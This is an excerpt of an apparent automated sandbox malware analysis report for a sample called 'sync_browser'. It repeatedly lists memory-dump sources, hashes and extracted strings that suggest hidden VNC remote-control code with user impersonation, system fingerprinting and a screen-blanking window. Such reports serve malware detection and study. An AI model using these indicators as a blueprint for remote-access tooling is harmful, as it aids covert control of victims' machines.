                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter
                                                                    • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                                    • API String ID: 2978645861-1267036565
                                                                    • Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                    • Instruction ID: 486867ef2c542e2816abc1f027d033ef4ef148c39fac9a4547c0dc05dab27ed0
                                                                    • Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                    • Instruction Fuzzy Hash: 48517F25A2CA82C4F654BB21A8146FAA3A1FF89790FC40036D95E463B9CF3CF905C770
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                                    • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                                    • API String ID: 1264956880-3227535004
                                                                    • Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                    • Instruction ID: 52fc5cfc38e7189009eb68a082b2af6058336f7d82ca03de4ca5959764abd8d4
                                                                    • Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                    • Instruction Fuzzy Hash: DCA1E532618696CAD744EF16E844A7EB7A8FB89B80F415036EE5E43764CF3DE805CB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                                    • API String ID: 171970310-1756215141
                                                                    • Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                    • Instruction ID: b48e91992d6bf3004cd930e39ee66bf459233f0df950afb8ee01cc209dced2fe
                                                                    • Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                    • Instruction Fuzzy Hash: 6AB18521A1C6C6C5E760AB35A8016B977A0FB057B0F804336EA7D47BE9DE2CF545C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                                    • API String ID: 171970310-18614430
                                                                    • Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                    • Instruction ID: 5439dc73e6525bfef756f3b5a7363f198e2c68d4118f9689d7e158f9357f97ae
                                                                    • Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                    • Instruction Fuzzy Hash: 82B18521A1C6C6C5E760AB35A8016B977A0FB057B4F804336EA7D47BE9DE2CF545C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
                                                                    • API String ID: 171970310-1760265636
                                                                    • Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                    • Instruction ID: f972114e35b0c8f05dbaae06b6775d697849e94b0ef90450c7225871fc3c666a
                                                                    • Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                    • Instruction Fuzzy Hash: 4FB17421A1C586C5E760AB35A8016B977A0FB047B4F804336EA7D87BE9DF2CF545C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
                                                                    • API String ID: 171970310-1812746349
                                                                    • Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                                    • Instruction ID: 3ecd22c13ea79b3c952f81ec3a3d6053169489cc252c4260cac4b94761e8ea5a
                                                                    • Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                                    • Instruction Fuzzy Hash: 54B18521A1C6C6C5E760AB35A8016B977A0FB057B4F804336EA7D47BE9DE2CF545C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                                    • API String ID: 171970310-3029765189
                                                                    • Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                    • Instruction ID: cb9a5926790d37adc984f5a8b3ddabe68379e2f71aaf4b1c19eba3aec5e32c7a
                                                                    • Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                    • Instruction Fuzzy Hash: 27B18521A1C586C5EB60EB35A4016B977A0FB057B0F804336E67E47BE9DE2CF505C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                                    • API String ID: 171970310-978419383
                                                                    • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                    • Instruction ID: 60e0691cfa3251dc13c1a61929309a64b778706be35d364e60601a46fe80f080
                                                                    • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                    • Instruction Fuzzy Hash: B4B17521A1C586C5E760AB35A4016B977A0FB057B4F804336EA7E47BE9DF6CF545C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                                    • API String ID: 171970310-3227166451
                                                                    • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                    • Instruction ID: dda9bf59b6eb99828fe7094085dd49f4a5ac5bc9cba70fb7c790399d5062471e
                                                                    • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                    • Instruction Fuzzy Hash: B6B17521A1C686C5EB60EB35A4016B977A0FB057B4F804336EA7E47BE9DE6CF545C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                                    • API String ID: 171970310-733379141
                                                                    • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                    • Instruction ID: 27418d4f171eeeae204163bdf17db3f54d458d04fd98dc7c5c82ec46f8a37441
                                                                    • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                    • Instruction Fuzzy Hash: C1B18521A1C586C5E760EB35A4016B977A0FB057B4F804336E67E87BE9DE2CF505C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
                                                                    • API String ID: 171970310-3099718995
                                                                    • Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                                    • Instruction ID: 01fb95fe52e616e74c61bb49d1ead2d2431addadcc82844c99a969b4a04f98c9
                                                                    • Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                                    • Instruction Fuzzy Hash: 60B17521A1C586C5EB60AB35A4016B977A0FB057B4F804336EA7E47BE9DF6CF545C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
                                                                    • API String ID: 171970310-4243357635
                                                                    • Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                                    • Instruction ID: fc5a9432ca0024cbbfa5a056b910e096df697a3790003b5984caec1f1483f53e
                                                                    • Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                                    • Instruction Fuzzy Hash: F7B18521A1C586C5EB60EB35A4016B977A0FB057B4F804336E67E87BE9DE2CF505C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
                                                                    • String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
                                                                    • API String ID: 2763862709-1375279643
                                                                    • Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                    • Instruction ID: b1cf22e9a9e9858106cbaecd12925d68fe2adea6bfa68ae226f61a17bb3e8299
                                                                    • Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                    • Instruction Fuzzy Hash: FD414B60A1CA83D1FB24FB25B8506BAA3A1BF88744FC55032E55E46779DE3CF149C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
